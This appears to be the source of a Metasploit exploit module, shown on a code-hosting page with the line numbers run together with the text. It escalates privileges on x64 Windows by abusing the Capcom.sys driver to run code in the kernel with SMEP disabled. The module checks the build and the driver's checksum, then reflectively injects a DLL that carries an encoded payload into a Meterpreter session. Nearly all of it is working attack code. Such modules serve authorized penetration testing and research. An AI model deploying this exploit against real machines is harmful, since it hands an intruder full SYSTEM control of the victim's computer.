Path: blob/master/modules/exploits/windows/local/capcom_sys_exec.rb
19664 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = NormalRanking78include Msf::Post::File9include Msf::Post::Windows::Priv10include Msf::Post::Windows::Process11include Msf::Post::Windows::ReflectiveDLLInjection12prepend Msf::Exploit::Remote::AutoCheck1314def initialize(info = {})15super(16update_info(17info,18{19'Name' => 'Windows Capcom.sys Kernel Execution Exploit (x64 only)',20'Description' => %q{21This module abuses the Capcom.sys kernel driver's function that allows for an22arbitrary function to be executed in the kernel from user land. This function23purposely disables SMEP prior to invoking a function given by the caller.24This has been tested on Windows 7, 8.1, 10 (x64) and Windows 11 (x64) upto build 22000.194.25Note that builds after 22000.194 contain deny lists that prevent this driver from loading.26},27'License' => MSF_LICENSE,28'Author' => [29'TheWack0lian', # Issue discovery30'OJ Reeves' # exploit and msf module31],32'Arch' => [ARCH_X64],33'Platform' => 'win',34'SessionTypes' => [ 'meterpreter' ],35'DefaultOptions' => {36'EXITFUNC' => 'thread'37},38'Targets' => [39[ 'Windows x64', { 'Arch' => ARCH_X64 } ]40],41'Payload' => {42'Space' => 4096,43'DisableNops' => true44},45'References' => [46['URL', 'https://twitter.com/TheWack0lian/status/779397840762245124']47],48'DisclosureDate' => '1999-01-01', # non-vuln exploit date49'DefaultTarget' => 0,50'Compat' => {51'Meterpreter' => {52'Commands' => %w[53stdapi_fs_md554stdapi_sys_config_driver_list55]56}57},58'Notes' => {59'Reliability' => UNKNOWN_RELIABILITY,60'Stability' => UNKNOWN_STABILITY,61'SideEffects' => UNKNOWN_SIDE_EFFECTS62}63}64)65)66end6768def check69return Exploit::CheckCode::Unknown unless session.platform == 'windows'7071version = get_version_info72if version.build_number < Msf::WindowsVersion::Win7_SP0 || version.windows_server?73return Exploit::CheckCode::Unknown74end7576# These versions of Windows 11 come built in with a driver block list preventing loading of capcom.sys77if version.build_number > Rex::Version.new('10.0.22000.194')78return Exploit::CheckCode::Safe('Target contains a block list which prevents the vulnerable driver from being loaded!')79end8081if sysinfo['Architecture'] != ARCH_X6482return Exploit::CheckCode::Safe83end8485# Validate that the driver has been loaded and that86# the version is the same as the one expected87client.sys.config.getdrivers.each do |d|88next unless d[:basename].downcase == 'capcom.sys'8990expected_checksum = '73c98438ac64a68e88b7b0afd11ba140'91target_checksum = client.fs.file.md5(d[:filename])9293if expected_checksum == Rex::Text.to_hex(target_checksum, '')94return Exploit::CheckCode::Appears95end96end9798return Exploit::CheckCode::Safe99end100101def exploit102if is_system?103fail_with(Failure::None, 'Session is already elevated')104end105106check_result = check107if check_result == Exploit::CheckCode::Safe || check_result == Exploit::CheckCode::Unknown108fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')109end110111if sysinfo['Architecture'] == ARCH_X64112if session.arch == ARCH_X86113fail_with(Failure::NoTarget, 'Running against WOW64 is not supported, please get an x64 session')114end115116if target.arch.first == ARCH_X86117fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')118end119end120121encoded_payload = payload.encoded122execute_dll(123::File.join(Msf::Config.data_directory, 'exploits', 'capcom_sys_exec', 'capcom_sys_exec.x64.dll'),124encoded_payload125)126127print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')128end129end130131132